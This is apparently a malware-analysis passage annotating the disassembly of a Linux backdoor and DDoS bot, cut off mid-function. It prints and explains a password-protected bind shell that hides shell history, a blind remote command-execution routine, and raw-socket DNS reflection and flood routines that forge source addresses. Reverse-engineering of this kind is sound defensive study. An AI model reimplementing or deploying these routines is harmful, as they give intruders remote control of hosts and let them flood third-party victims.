 80488e3:   66 c7 85 3a ee ff ff    movw   $0xf15a,0xffffee3a(%ebp)
 80488ea:   5a f1 
 80488ec:   c7 85 3c ee ff ff 00    movl   $0x0,0xffffee3c(%ebp)
 80488f3:   00 00 00 
 80488f6:   c7 85 40 bb ff ff 01    movl   $0x1,0xffffbb40(%ebp)
 80488fd:   00 00 00 
 create a TCP socket, socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
 8048900:   6a 00                   push   $0x0
 8048902:   6a 01                   push   $0x1
 8048904:   6a 02                   push   $0x2 // PF_INET
 8048906:   e8 e9 e3 00 00          call   socket
 804890b:   89 85 38 bb ff ff       mov    %eax,socket_proto_b(%ebp)
 ignore some signals, see "kill -l"
 8048911:   6a 01                   push   $0x1
 8048913:   6a 11                   push   $0x11    // SIGCHLD
 8048915:   e8 a2 e0 00 00          call   bsd_signal
 804891a:   6a 01                   push   $0x1
 804891c:   6a 11                   push   $0x11    // SIGCHLD, again ?
 804891e:   e8 99 e0 00 00          call   bsd_signal
 8048923:   6a 01                   push   $0x1
 8048925:   6a 01                   push   $0x1 // SIGHUP
 8048927:   e8 90 e0 00 00          call   bsd_signal
 804892c:   83 c4 24                add    $0x24,%esp
 804892f:   6a 01                   push   $0x1
 8048931:   6a 0f                   push   $0xf // SIGTERM
 8048933:   e8 84 e0 00 00          call   bsd_signal
 8048938:   6a 01                   push   $0x1
 804893a:   6a 02                   push   $0x2 // SIGINT
 804893c:   e8 7b e0 00 00          call   bsd_signal
 setsockopt(sock_tcp, SOL_SOCKET, SO_REUSEADDR, [1], 4)
 8048941:   6a 04                   push   $0x4
 8048943:   8d 85 40 bb ff ff       lea    0xffffbb40(%ebp),%eax
 8048949:   50                      push   %eax
 804894a:   6a 02                   push   $0x2
 804894c:   6a 01                   push   $0x1
 804894e:   8b 8d 38 bb ff ff       mov    socket_proto_b(%ebp),%ecx
 8048954:   51                      push   %ecx
 8048955:   e8 42 e3 00 00          call   setsockopt
 804895a:   83 c4 24                add    $0x24,%esp
 bind(sock_tcp, {sin_family=AF_INET, sin_port=htons(23281), sin_addr=inet_addr("0.0.0.0")}}, 16)
 804895d:   6a 10                   push   $0x10    // sizeof(addr)
 804895f:   8d 85 38 ee ff ff       lea    0xffffee38(%ebp),%eax
 8048965:   50                      push   %eax // addr
 8048966:   8b 95 38 bb ff ff       mov    socket_proto_b(%ebp),%edx
 804896c:   52                      push   %edx
 804896d:   e8 02 e1 00 00          call   bind
 listen(sock_tcp,3)
 8048972:   6a 03                   push   $0x3
 8048974:   8b 8d 38 bb ff ff       mov    socket_proto_b(%ebp),%ecx
 804897a:   51                      push   %ecx
 804897b:   e8 84 e1 00 00          call   listen
 8048980:   83 c4 14                add    $0x14,%esp
 8048983:   90                      nop    
 accept(sock_tcp,addr,sizeof(addr))
 8048984:   8d 85 3c bb ff ff       lea    0xffffbb3c(%ebp),%eax // length
 804898a:   50                      push   %eax
 804898b:   8d 85 28 ee ff ff       lea    0xffffee28(%ebp),%eax // addr
 8048991:   50                      push   %eax
 8048992:   8b 95 38 bb ff ff       mov    socket_proto_b(%ebp),%edx
 8048998:   52                      push   %edx
 8048999:   e8 8e e0 00 00          call   accept
 804899e:   89 85 34 bb ff ff       mov    %eax,socket_connect(%ebp)
 80489a4:   83 c4 0c                add    $0xc,%esp  // length
 80489a7:   85 c0                   test   %eax,%eax
 80489a9:   0f 84 15 01 00 00       je     0x8048ac4
 80489af:   e8 34 e8 00 00          call   fork
 80489b4:   85 c0                   test   %eax,%eax
 80489b6:   75 cc                   jne    0x8048984

 recv(sock_tcp,buf,0x13,0)
 80489b8:   6a 00                   push   $0x0 // flags
 80489ba:   6a 13                   push   $0x13    // length
 80489bc:   8d 85 44 bc ff ff       lea    0xffffbc44(%ebp),%eax
 80489c2:   50                      push   %eax // buf
 80489c3:   8b 8d 34 bb ff ff       mov    socket_connect(%ebp),%ecx
 80489c9:   51                      push   %ecx // socket
 80489ca:   e8 75 e1 00 00          call   recv

 for(ebx=0;ebx<0x13;ebx++)
 80489cf:   31 db                   xor    %ebx,%ebx
 80489d1:   83 c4 10                add    $0x10,%esp
 if((car[ebx]==0x0A)||(car[ebx]==0x0D))
 80489d4:   8a 84 2b 44 bc ff ff    mov    0xffffbc44(%ebx,%ebp,1),%al
 80489db:   3c 0a                   cmp    $0xa,%al
 80489dd:   74 04                   je     0x80489e3
 80489df:   3c 0d                   cmp    $0xd,%al
 80489e1:   75 0d                   jne    0x80489f0
 car[ebx]=0
 80489e3:   c6 84 2b 44 bc ff ff    movb   $0x0,0xffffbc44(%ebx,%ebp,1)
 80489ea:   00 
 80489eb:   eb 11                   jmp    0x80489fe
 80489ed:   8d 76 00                lea    0x0(%esi),%esi
 else car[ebx]++;
 80489f0:   88 84 2b 44 bc ff ff    mov    %al,0xffffbc44(%ebx,%ebp,1)
 80489f7:   fe 84 2b 44 bc ff ff    incb   0xffffbc44(%ebx,%ebp,1)

 80489fe:   43                      inc    %ebx
 80489ff:   83 fb 12                cmp    $0x12,%ebx
 8048a02:   7e d0                   jle    0x80489d4

 Test password, strncmp(buffer,password,6)
 The password must be SeNiF
 8048a04:   8d b5 44 bc ff ff       lea    0xffffbc44(%ebp),%esi
 8048a0a:   bf 17 76 06 08          mov    passwd,%edi
 8048a0f:   b9 06 00 00 00          mov    $0x6,%ecx
 8048a14:   fc                      cld    
 8048a15:   a8 00                   test   $0x0,%al
 8048a17:   f3 a6                   repz cmpsb %es:(%edi),%ds:(%esi)
 8048a19:   74 29                   je     0x8048a44

 Bad password: close(sock_tcp)
 8048a1b:   6a 00                   push   $0x0
 8048a1d:   6a 04                   push   $0x4
 8048a1f:   68 1d 76 06 08          push   $0x806761d FF FB 01 02
 8048a24:   8b 95 34 bb ff ff       mov    socket_connect(%ebp),%edx
 8048a2a:   52                      push   %edx
 8048a2b:   e8 c0 e1 00 00          call   send
 8048a30:   8b 8d 34 bb ff ff       mov    socket_connect(%ebp),%ecx
 8048a36:   51                      push   %ecx
 8048a37:   e8 24 e7 00 00          call   close
 8048a3c:   6a 01                   push   $0x1
 8048a3e:   e8 79 d5 00 00          call   exit
 8048a43:   90                      nop    
 Good pwd: dup2 stdin, stdout,stderr
 8048a44:   6a 00                   push   $0x0
 8048a46:   8b 95 34 bb ff ff       mov    socket_connect(%ebp),%edx
 8048a4c:   52                      push   %edx
 8048a4d:   e8 3a e7 00 00          call   dup2
 8048a52:   6a 01                   push   $0x1
 8048a54:   8b 8d 34 bb ff ff       mov    socket_connect(%ebp),%ecx
 8048a5a:   51                      push   %ecx
 8048a5b:   e8 2c e7 00 00          call   dup2
 8048a60:   6a 02                   push   $0x2
 8048a62:   8b 95 34 bb ff ff       mov    socket_connect(%ebp),%edx
 8048a68:   52                      push   %edx
 8048a69:   e8 1e e7 00 00          call   dup2
 set the environement
 8048a6e:   6a 01                   push   $0x1
 8048a70:   68 21 76 06 08          push   m_PATH_in
 8048a75:   68 51 76 06 08          push   m_PATH
 8048a7a:   e8 29 18 00 00          call   setenv
 8048a7f:   83 c4 24                add    $0x24,%esp
 8048a82:   68 56 76 06 08          push   m_HISTFILE
 8048a87:   e8 00 1a 00 00          call   unsetenv
 8048a8c:   6a 01                   push   $0x1
 8048a8e:   68 5f 76 06 08          push   m_TERM_linux
 8048a93:   68 65 76 06 08          push   m_TERM
 8048a98:   e8 0b 18 00 00          call   setenv
 run the shell
 8048a9d:   6a 00                   push   $0x0
 8048a9f:   68 6a 76 06 08          push   $0x806766a
 8048aa4:   68 6d 76 06 08          push   $0x806766d
 8048aa9:   e8 4e cb 00 00          call   go_execve
 close the socket and quit
 8048aae:   8b 8d 34 bb ff ff       mov    socket_connect(%ebp),%ecx
 8048ab4:   51                      push   %ecx
 8048ab5:   e8 a6 e6 00 00          call   close
 8048aba:   83 c4 20                add    $0x20,%esp
 8048abd:   6a 00                   push   $0x0
 8048abf:   e8 f8 d4 00 00          call   exit

Function 7: blind command execution

The command send by the hacker is executed and that's all.

 8048b18:   31 db                   xor    %ebx,%ebx
 8048b1a:   8d 36                   lea    (%esi),%esi
 8048b1c:   8a 84 2b 02 f0 ff ff    mov    0xfffff002(%ebx,%ebp,1),%al
 8048b23:   88 84 2b 00 f0 ff ff    mov    %al,decrypted_data(%ebx,%ebp,1)
 8048b2a:   43                      inc    %ebx
 8048b2b:   81 fb 8d 01 00 00       cmp    $0x18d,%ebx
 8048b31:   7e e9                   jle    0x8048b1c
 8048b33:   8b 95 20 bb ff ff       mov    decrypted_data_ptr(%ebp),%edx
 8048b39:   52                      push   %edx
 8048b3a:   68 75 76 06 08          push   $0x8067675 /bin/csh ...
 8048b3f:   8d 9d 00 f8 ff ff       lea    buffer_sock_raw(%ebp),%ebx
 8048b45:   53                      push   %ebx
 8048b46:   e8 bd 6c 00 00          call   sprintf
 8048b4b:   53                      push   %ebx
 8048b4c:   e8 97 cc 00 00          call   system
 8048b51:   6a 00                   push   $0x0
 8048b53:   e8 fc e9 00 00          call   exit

Function 8: Stop

This command stops the functions 4-6,9-12.

 8048b58:   a1 74 e7 07 08          mov    pid,%eax
 8048b5d:   85 c0                   test   %eax,%eax
 8048b5f:   0f 84 53 03 00 00       je     go_boucle
 8048b65:   6a 09                   push   $0x9
 8048b67:   50                      push   %eax
 8048b68:   e8 43 e7 00 00          call   kill
 8048b6d:   c7 05 74 e7 07 08 00    movl   $0x0,pid

Function 4,9: DNS queries of servers

/*
Arguments:
0x08 0x0c 0x10 0x14 IP src
0x18 cpt (function 4: set to 0)
0x1C 0x20 source port
0x24 !=0 use name
0x28 name src
*/
 8049174:   55                      push   %ebp
 8049175:   89 e5                   mov    %esp,%ebp
 8049177:   81 ec 74 06 00 00       sub    $0x674,%esp
 804917d:   57                      push   %edi
 804917e:   56                      push   %esi
 804917f:   53                      push   %ebx
 Copy function argument
 8049180:   8a 5d 08                mov    0x8(%ebp),%bl
 8049183:   88 9d bc f9 ff ff       mov    %bl,param_8(%ebp)
 8049189:   8a 5d 0c                mov    0xc(%ebp),%bl
 804918c:   88 9d b8 f9 ff ff       mov    %bl,param_c(%ebp)
 8049192:   8a 5d 10                mov    0x10(%ebp),%bl
 8049195:   88 9d b4 f9 ff ff       mov    %bl,param_10(%ebp)
 804919b:   8a 5d 14                mov    0x14(%ebp),%bl
 804919e:   88 9d b0 f9 ff ff       mov    %bl,param_14(%ebp)
 Copy DNS query length
 80491a4:   8d 7d dc                lea    0xffffffdc(%ebp),%edi
 80491a7:   be 98 76 06 08          mov    $0x8067698,%esi
 80491ac:   fc                      cld    
 80491ad:   b9 09 00 00 00          mov    $0x9,%ecx
 80491b2:   f3 a5                   repz movsl %ds:(%esi),%es:(%edi)

 80491b4:   c7 85 ac f9 ff ff 01    movl   $0x1,0xfffff9ac(%ebp) // first_time
 80491bb:   00 00 00 

 Copy DNS query list
 80491be:   8d bd e8 fd ff ff       lea    0xfffffde8(%ebp),%edi
 80491c4:   be bc 76 06 08          mov    $0x80676bc,%esi  // question list
 80491c9:   fc                      cld    
 80491ca:   b9 7d 00 00 00          mov    $0x7d,%ecx
 80491cf:   f3 a5                   repz movsl %ds:(%esi),%es:(%edi)
 init data
 80491d1:   8d b5 c8 f9 ff ff       lea    0xfffff9c8(%ebp),%esi    // IP
 80491d7:   8d 9d dc f9 ff ff       lea    0xfffff9dc(%ebp),%ebx    // UDP
 80491dd:   89 9d a4 f9 ff ff       mov    %ebx,0xfffff9a4(%ebp)
 80491e3:   8d 9d e4 f9 ff ff       lea    0xfffff9e4(%ebp),%ebx    // DNS
 80491e9:   89 9d a0 f9 ff ff       mov    %ebx,0xfffff9a0(%ebp)
 80491ef:   66 c7 85 d8 fd ff ff    movw   $0x2,0xfffffdd8(%ebp)    // addr AF_INET;
 80491f6:   02 00 
 80491f8:   66 c7 85 da fd ff ff    movw   $0x0,0xfffffdda(%ebp)    // port=0
 80491ff:   00 00 
 8049201:   83 7d 18 00             cmpl   $0x0,0x18(%ebp)
 8049205:   74 03                   je     0x804920a
 8049207:   ff 4d 18                decl   0x18(%ebp)
 get a socket
 804920a:   68 ff 00 00 00          push   $0xff
 804920f:   6a 03                   push   $0x3 SOCK_RAW
 8049211:   6a 02                   push   $0x2 INET
 8049213:   e8 dc da 00 00          call   socket
 8049218:   89 85 a8 f9 ff ff       mov    %eax,socket(%ebp)
 804921e:   83 c4 0c                add    $0xc,%esp
 8049221:   85 c0                   test   %eax,%eax
 8049223:   0f 8e 1f 03 00 00       jle    0x8049548    // abort
 8049229:   c7 85 9c f9 ff ff 00    movl   $0x0,0xfffff99c(%ebp)    // cpt
 8049230:   00 00 00 
 8049233:   c7 85 98 f9 ff ff 00    movl   $0x0,0xfffff998(%ebp) // has_done_resolv ?
 804923a:   00 00 00 

memset(ip_header,0,0x400)
 804923d:   68 00 04 00 00          push   $0x400
 8049242:   6a 00                   push   $0x0
 8049244:   56                      push   %esi
 8049245:   e8 1a e5 00 00          call   memset

 804924a:   83 c4 0c                add    $0xc,%esp
 804924d:   8d 76 00                lea    0x0(%esi),%esi

whole_circus:
if 0x24, set IP src from name at 0x28
 8049250:   31 ff                   xor    %edi,%edi
 8049252:   83 7d 24 00             cmpl   $0x0,0x24(%ebp)
 8049256:   74 5a                   je     0x80492b2
 8049258:   83 bd 98 f9 ff ff 00    cmpl   $0x0,0xfffff998(%ebp)
 804925f:   7f 51                   jg     0x80492b2
 8049261:   8b 5d 28                mov    0x28(%ebp),%ebx
 8049264:   53                      push   %ebx
 8049265:   e8 16 2d 00 00          call   get_host_by_name
 804926a:   89 c2                   mov    %eax,%edx
 804926c:   83 c4 04                add    $0x4,%esp
 804926f:   85 d2                   test   %edx,%edx
 8049271:   75 15                   jne    0x8049288
 8049273:   68 58 02 00 00          push   $0x258
 8049278:   e8 4f c4 00 00          call   seterrno_cx
 804927d:   bf 01 00 00 00          mov    $0x1,%edi
 8049282:   83 c4 04                add    $0x4,%esp
 8049285:   eb 2b                   jmp    0x80492b2
 8049287:   90                      nop    
 copy IP dst to buffer fffff9c4
 8049288:   6a 04                   push   $0x4
 804928a:   8d 85 c4 f9 ff ff       lea    0xfffff9c4(%ebp),%eax
 8049290:   50                      push   %eax
 8049291:   8b 42 10                mov    0x10(%edx),%eax
 8049294:   8b 00                   mov    (%eax),%eax
 8049296:   50                      push   %eax
 8049297:   e8 e4 d1 00 00          call   bcopy
 804929c:   8b 85 c4 f9 ff ff       mov    0xfffff9c4(%ebp),%eax
 and set IP src
 80492a2:   89 46 0c                mov    %eax,0xc(%esi) 

 80492a5:   c7 85 98 f9 ff ff 40    movl   $0x9c40,0xfffff998(%ebp) // 40 000
 80492ac:   9c 00 00 
 80492af:   83 c4 0c                add    $0xc,%esp

 80492b2:   85 ff                   test   %edi,%edi
 80492b4:   75 9a                   jne    0x8049250
 80492b6:   31 ff                   xor    %edi,%edi // quest nbr
 80492b8:   c7 85 90 f9 ff ff 00    movl   $0x0,0xfffff990(%ebp) // quest idx=0
 80492bf:   00 00 00 
 80492c2:   8d 36                   lea    (%esi),%esi
quest_next:
first time ?
 80492c4:   83 bd ac f9 ff ff 01    cmpl   $0x1,0xfffff9ac(%ebp)
 80492cb:   75 1b                   jne    0x80492e8
 Random position in IP list
 80492cd:   c7 85 ac f9 ff ff 00    movl   $0x0,0xfffff9ac(%ebp)
 80492d4:   00 00 00 
 80492d7:   e8 5c cb 00 00          call   random
 80492dc:   bb 40 1f 00 00          mov    $0x1f40,%ebx // 8000
 80492e1:   99                      cltd   
 80492e2:   f7 fb                   idiv   %ebx,%eax
 80492e4:   eb 04                   jmp    0x80492ea
 80492e6:   8d 36                   lea    (%esi),%esi

 80492e8:   31 d2                   xor    %edx,%edx

 80492ea:   83 3c 95 2c d2 06 08    cmpl   $0x0,0x806d22c(,%edx,4)
 80492f1:   00 
 80492f2:   0f 84 38 02 00 00       je     0x8049530    // next DNS req
 80492f8:   8d 14 95 2c d2 06 08    lea    0x806d22c(,%edx,4),%edx
 80492ff:   89 95 94 f9 ff ff       mov    %edx,0xfffff994(%ebp)
 8049305:   8d 76 00                lea    0x0(%esi),%esi
 
loop_ip:
set IP dest in address for sendto
 8049308:   8b 9d 94 f9 ff ff       mov    0xfffff994(%ebp),%ebx
 804930e:   8b 03                   mov    (%ebx),%eax      
 8049310:   89 85 dc fd ff ff       mov    %eax,0xfffffddc(%ebp)    // addr.addr

copy a DNS query
 8049316:   8b 9d 90 f9 ff ff       mov    0xfffff990(%ebp),%ebx // quest idx
 804931c:   8d 94 1d e8 fd ff ff    lea    0xfffffde8(%ebp,%ebx,1),%edx // query list
 8049323:   8b 44 bd dc             mov    0xffffffdc(%ebp,%edi,4),%eax
 8049327:   50                      push   %eax // size
 8049328:   52                      push   %edx // src
 8049329:   8b 9d a0 f9 ff ff       mov    0xfffff9a0(%ebp),%ebx // DNS
 804932f:   53                      push   %ebx
 8049330:   e8 f7 d1 00 00          call   memcopy
 8049335:   83 c4 0c                add    $0xc,%esp
 
DNS transaction id is random
 8049338:   e8 fb ca 00 00          call   random
 804933d:   bb ff 00 00 00          mov    $0xff,%ebx
 8049342:   99                      cltd   
 8049343:   f7 fb                   idiv   %ebx,%eax
 8049345:   8b 9d a0 f9 ff ff       mov    0xfffff9a0(%ebp),%ebx
 804934b:   88 13                   mov    %dl,(%ebx)
 804934d:   e8 e6 ca 00 00          call   random
 8049352:   bb ff 00 00 00          mov    $0xff,%ebx
 8049357:   99                      cltd   
 8049358:   f7 fb                   idiv   %ebx,%eax
 804935a:   8b 9d a0 f9 ff ff       mov    0xfffff9a0(%ebp),%ebx
 8049360:   88 53 01                mov    %dl,0x1(%ebx)
 
if not specified, random UDP source port
 8049363:   83 7d 1c 00             cmpl   $0x0,0x1c(%ebp)
 8049367:   75 17                   jne    0x8049380
 8049369:   83 7d 20 00             cmpl   $0x0,0x20(%ebp)
 804936d:   75 11                   jne    0x8049380
 804936f:   e8 c4 ca 00 00          call   random
 8049374:   bb 30 75 00 00          mov    $0x7530,%ebx
 8049379:   99                      cltd   
 804937a:   f7 fb                   idiv   %ebx,%eax
 804937c:   89 d0                   mov    %edx,%eax
 804937e:   eb 0a                   jmp    0x804938a
 8049380:   8b 45 1c                mov    0x1c(%ebp),%eax
 8049383:   c1 e0 08                shl    $0x8,%eax
 8049386:   66 03 45 20             add    0x20(%ebp),%ax
 804938a:   86 c4                   xchg   %al,%ah
 804938c:   8b 9d a4 f9 ff ff       mov    0xfffff9a4(%ebp),%ebx
 8049392:   66 89 03                mov    %ax,(%ebx)   // UDP src port 

UDP dst port=53
 8049395:   8b 9d a4 f9 ff ff       mov    0xfffff9a4(%ebp),%ebx
 804939b:   66 c7 43 02 00 35       movw   $0x3500,0x2(%ebx)
set UDP size=UDP header size (8)+size of DNS query
 80493a1:   66 8b 44 bd dc          mov    0xffffffdc(%ebp,%edi,4),%ax
 80493a6:   66 83 c0 08             add    $0x8,%ax // add UDP header
 80493aa:   86 c4                   xchg   %al,%ah
 80493ac:   66 89 43 04             mov    %ax,0x4(%ebx)
UDP crc = 0
 80493b0:   66 c7 43 06 00 00       movw   $0x0,0x6(%ebx)

set IP src from IP
 80493b6:   83 7d 24 00             cmpl   $0x0,0x24(%ebp)
 80493ba:   75 30                   jne    0x80493ec
 80493bc:   8a 9d bc f9 ff ff       mov    param_8(%ebp),%bl
 80493c2:   88 9d d4 f9 ff ff       mov    %bl,0xfffff9d4(%ebp)
 80493c8:   8a 9d b8 f9 ff ff       mov    param_c(%ebp),%bl
 80493ce:   88 9d d5 f9 ff ff       mov    %bl,0xfffff9d5(%ebp)
 80493d4:   8a 9d b4 f9 ff ff       mov    param_10(%ebp),%bl
 80493da:   88 9d d6 f9 ff ff       mov    %bl,0xfffff9d6(%ebp)
 80493e0:   8a 9d b0 f9 ff ff       mov    param_14(%ebp),%bl
 80493e6:   88 9d d7 f9 ff ff       mov    %bl,0xfffff9d7(%ebp)

set IP dest
 80493ec:   8b 9d 94 f9 ff ff       mov    0xfffff994(%ebp),%ebx
 80493f2:   8b 03                   mov    (%ebx),%eax
 80493f4:   89 46 10                mov    %eax,0x10(%esi)

IPv4, ip header=20 bytes
 80493f7:   c6 06 45                movb   $0x45,(%esi)

set TTL between 120 and 255
 80493fa:   e8 39 ca 00 00          call   random
 80493ff:   bb 82 00 00 00          mov    $0x82,%ebx
 8049404:   99                      cltd   
 8049405:   f7 fb                   idiv   %ebx,%eax
 8049407:   80 c2 78                add    $0x78,%dl    
 804940a:   88 56 08                mov    %dl,0x8(%esi)

IP id=random
 804940d:   e8 26 ca 00 00          call   random
 8049412:   bb ff 00 00 00          mov    $0xff,%ebx
 8049417:   99                      cltd   
 8049418:   f7 fb                   idiv   %ebx,%eax
 804941a:   66 89 56 04             mov    %dx,0x4(%esi)

IP proto=0x11=UDP
 804941e:   c6 46 09 11             movb   $0x11,0x9(%esi)

IP flag=0
 8049422:   66 c7 46 06 00 00       movw   $0x0,0x6(%esi)
IP len=dns+ip header(20)+udp header(8)
 8049428:   66 8b 44 bd dc          mov    0xffffffdc(%ebp,%edi,4),%ax
 804942d:   66 83 c0 1c             add    $0x1c,%ax
 8049431:   86 c4                   xchg   %al,%ah
 8049433:   66 89 46 02             mov    %ax,0x2(%esi)

Calculate IP crc
Initialise stored IP crc to 0
 8049437:   66 c7 46 0a 00 00       movw   $0x0,0xa(%esi)
 804943d:   ba 14 00 00 00          mov    $0x14,%edx   // IP header=20
 8049442:   8d 9d c8 f9 ff ff       lea    0xfffff9c8(%ebp),%ebx // IP
 8049448:   89 9d 8c f9 ff ff       mov    %ebx,0xfffff98c(%ebp)
 804944e:   31 c9                   xor    %ecx,%ecx
 Initialise calculated IP crc to 0
 8049450:   66 c7 85 c2 f9 ff ff    movw   $0x0,0xfffff9c2(%ebp)
 8049457:   00 00 
 8049459:   8d 76 00                lea    0x0(%esi),%esi

 804945c:   8b 9d 8c f9 ff ff       mov    0xfffff98c(%ebp),%ebx
 8049462:   0f b7 03                movzwl (%ebx),%eax
 8049465:   01 c1                   add    %eax,%ecx
 8049467:   83 c3 02                add    $0x2,%ebx
 804946a:   89 9d 8c f9 ff ff       mov    %ebx,0xfffff98c(%ebp)
 8049470:   83 c2 fe                add    $0xfffffffe,%edx //edx-=2
 8049473:   83 fa 01                cmp    $0x1,%edx
 8049476:   7f e4                   jg     0x804945c
 8049478:   75 11                   jne    0x804948b
 804947a:   8a 03                   mov    (%ebx),%al
 804947c:   88 85 c2 f9 ff ff       mov    %al,0xfffff9c2(%ebp)
 8049482:   0f b7 85 c2 f9 ff ff    movzwl 0xfffff9c2(%ebp),%eax
 8049489:   01 c1                   add    %eax,%ecx
 804948b:   89 ca                   mov    %ecx,%edx
 804948d:   c1 fa 10                sar    $0x10,%edx
 8049490:   0f b7 c1                movzwl %cx,%eax
 8049493:   8d 0c 10                lea    (%eax,%edx,1),%ecx
 8049496:   89 c8                   mov    %ecx,%eax
 8049498:   c1 f8 10                sar    $0x10,%eax
 804949b:   01 c1                   add    %eax,%ecx
 804949d:   89 c8                   mov    %ecx,%eax
 804949f:   66 f7 d0                not    %ax
Save the crc
 80494a2:   66 89 85 c2 f9 ff ff    mov    %ax,0xfffff9c2(%ebp)
 80494a9:   66 89 46 0a             mov    %ax,0xa(%esi)

Send the DNS request
 80494ad:   6a 10                   push   $0x10            /len
 80494af:   8d 85 d8 fd ff ff       lea    0xfffffdd8(%ebp),%eax    // to
 80494b5:   50                      push   %eax         
 80494b6:   6a 00                   push   $0x0         // flag
 80494b8:   8b 44 bd dc             mov    0xffffffdc(%ebp,%edi,4),%eax
 80494bc:   83 c0 1c                add    $0x1c,%eax       //len
 80494bf:   50                      push   %eax
 80494c0:   8d 85 c8 f9 ff ff       lea    0xfffff9c8(%ebp),%eax    // IP
 80494c6:   50                      push   %eax
 80494c7:   8b 9d a8 f9 ff ff       mov    socket(%ebp),%ebx    // socket
 80494cd:   53                      push   %ebx
 80494ce:   e8 69 d7 00 00          call   sendto
 80494d3:   83 c4 18                add    $0x18,%esp
 80494d6:   83 7d 18 00             cmpl   $0x0,0x18(%ebp) // ?
 80494da:   75 0c                   jne    0x80494e8
 80494dc:   68 2c 01 00 00          push   $0x12c
 80494e1:   e8 ca c0 00 00          call   feof
 80494e6:   eb 1f                   jmp    0x8049507

 80494e8:   8b 5d 18                mov    0x18(%ebp),%ebx
 80494eb:   39 9d 9c f9 ff ff       cmp    %ebx,0xfffff99c(%ebp)    // cpt
 80494f1:   75 21                   jne    0x8049514
 80494f3:   68 2c 01 00 00          push   $0x12c
 80494f8:   e8 b3 c0 00 00          call   feof
 80494fd:   c7 85 9c f9 ff ff 00    movl   $0x0,0xfffff99c(%ebp)    // cpt=0
 8049504:   00 00 00 

 8049507:   ff 8d 98 f9 ff ff       decl   0xfffff998(%ebp)
 804950d:   83 c4 04                add    $0x4,%esp
 8049510:   eb 08                   jmp    0x804951a
 8049512:   8d 36                   lea    (%esi),%esi
 8049514:   ff 85 9c f9 ff ff       incl   0xfffff99c(%ebp) //cpt++

next IP dest in IP list
 804951a:   83 85 94 f9 ff ff 04    addl   $0x4,0xfffff994(%ebp)
 8049521:   8b 9d 94 f9 ff ff       mov    0xfffff994(%ebp),%ebx
 8049527:   83 3b 00                cmpl   $0x0,(%ebx)
 804952a:   0f 85 d8 fd ff ff       jne    0x8049308    // loop_ip

No more IP, restart with next DNS request

 8049530:   83 85 90 f9 ff ff 32    addl   $0x32,0xfffff990(%ebp) // add size of a quest 
 8049537:   47                      inc    %edi
 8049538:   83 ff 08                cmp    $0x8,%edi  // nbr of quest
 804953b:   0f 8e 83 fd ff ff       jle    0x80492c4  // jle quest_next

end of while(1)
 8049541:   e9 0a fd ff ff          jmp    0x8049250
 8049546:   8d 36                   lea    (%esi),%esi

pid=0; return 0;
 8049548:   c7 05 74 e7 07 08 00    movl   $0x0,pid
 804954f:   00 00 00 
 8049552:   31 c0                   xor    %eax,%eax
 8049554:   8d a5 80 f9 ff ff       lea    0xfffff980(%ebp),%esp
 804955a:   5b                      pop    %ebx
 804955b:   5e                      pop    %esi
 804955c:   5f                      pop    %edi
 804955d:   89 ec                   mov    %ebp,%esp
 804955f:   5d                      pop    %ebp
 8049560:   c3                      ret    
 8049561:   8d 76 00                lea    0x0(%esi),%esi

Function 12: DNS flood

This function is very similar to the previous one. Instead of querying server from a list, it floods a DNS with repeted DNS queries.

 8049564:   55                      push   %ebp
 8049565:   89 e5                   mov    %esp,%ebp
 8049567:   81 ec 8c 06 00 00       sub    $0x68c,%esp
 804956d:   57                      push   %edi
 804956e:   56                      push   %esi
 804956f:   53                      push   %ebx
 Copy function argument
 8049570:   8a 5d 08                mov    0x8(%ebp),%bl
 8049573:   88 9d ac f9 ff ff       mov    %bl,IP_dst_0(%ebp) // IP dst
 8049579:   8a 5d 0c                mov    0xc(%ebp),%bl
 804957c:   88 9d a8 f9 ff ff       mov    %bl,IP_dst_1(%ebp)
 8049582:   8a 5d 10                mov    0x10(%ebp),%bl
 8049585:   88 9d a4 f9 ff ff       mov    %bl,IP_dst_2(%ebp)
 804958b:   8a 5d 14                mov    0x14(%ebp),%bl
 804958e:   88 9d a0 f9 ff ff       mov    %bl,IP_dst_3(%ebp)
 8049594:   8a 5d 18                mov    0x18(%ebp),%bl
 8049597:   88 9d 9c f9 ff ff       mov    %bl,IP_src_0(%ebp)
 804959d:   8a 5d 1c                mov    0x1c(%ebp),%bl
 80495a0:   88 9d 98 f9 ff ff       mov    %bl,IP_src_1(%ebp)
 80495a6:   8a 5d 20                mov    0x20(%ebp),%bl
 80495a9:   88 9d 94 f9 ff ff       mov    %bl,IP_src_2(%ebp)
 80495af:   8a 5d 24                mov    0x24(%ebp),%bl
 80495b2:   88 9d 90 f9 ff ff       mov    %bl,IP_src_3(%ebp)
 Copy DNS query length
 80495b8:   8d 7d dc                lea    0xffffffdc(%ebp),%edi
 80495bb:   be 98 76 06 08          mov    $0x8067698,%esi
 80495c0:   fc                      cld    
 80495c1:   b9 09 00 00 00          mov    $0x9,%ecx
 80495c6:   f3 a5                   repz movsl %ds:(%esi),%es:(%edi)

 Copy DNS query list
 80495c8:   8d bd e8 fd ff ff       lea    0xfffffde8(%ebp),%edi
 80495ce:   be bc 76 06 08          mov    $0x80676bc,%esi  // question list
 80495d3:   fc                      cld    
 80495d4:   b9 7d 00 00 00          mov    $0x7d,%ecx
 80495d9:   f3 a5                   repz movsl %ds:(%esi),%es:(%edi)

 init data
 80495db:   8d bd d8 f9 ff ff       lea    0xfffff9d8(%ebp),%edi    // IP
 80495e1:   8d 9d ec f9 ff ff       lea    0xfffff9ec(%ebp),%ebx    // UDP
 80495e7:   89 9d 88 f9 ff ff       mov    %ebx,0xfffff988(%ebp)
 80495ed:   8d 9d f4 f9 ff ff       lea    0xfffff9f4(%ebp),%ebx    // DNS
 80495f3:   89 9d 84 f9 ff ff       mov    %ebx,0xfffff984(%ebp)
 80495f9:   66 c7 85 d8 fd ff ff    movw   $0x2,0xfffffdd8(%ebp)    // addr.AF_INET
 8049600:   02 00 
 8049602:   66 c7 85 da fd ff ff    movw   $0x0,0xfffffdda(%ebp)    //port =0
 8049609:   00 00 
 use name ?
 804960b:   83 7d 34 00             cmpl   $0x0,0x34(%ebp)
 804960f:   75 34                   jne    0x8049645
 set destination IP
 8049611:   0f b6 85 a0 f9 ff ff    movzbl IP_dst_3(%ebp),%eax
 8049618:   50                      push   %eax
 8049619:   0f b6 85 a4 f9 ff ff    movzbl IP_dst_2(%ebp),%eax
 8049620:   50                      push   %eax
 8049621:   0f b6 85 a8 f9 ff ff    movzbl IP_dst_1(%ebp),%eax
 8049628:   50                      push   %eax
 8049629:   0f b6 85 ac f9 ff ff    movzbl IP_dst_0(%ebp),%eax
 8049630:   50                      push   %eax
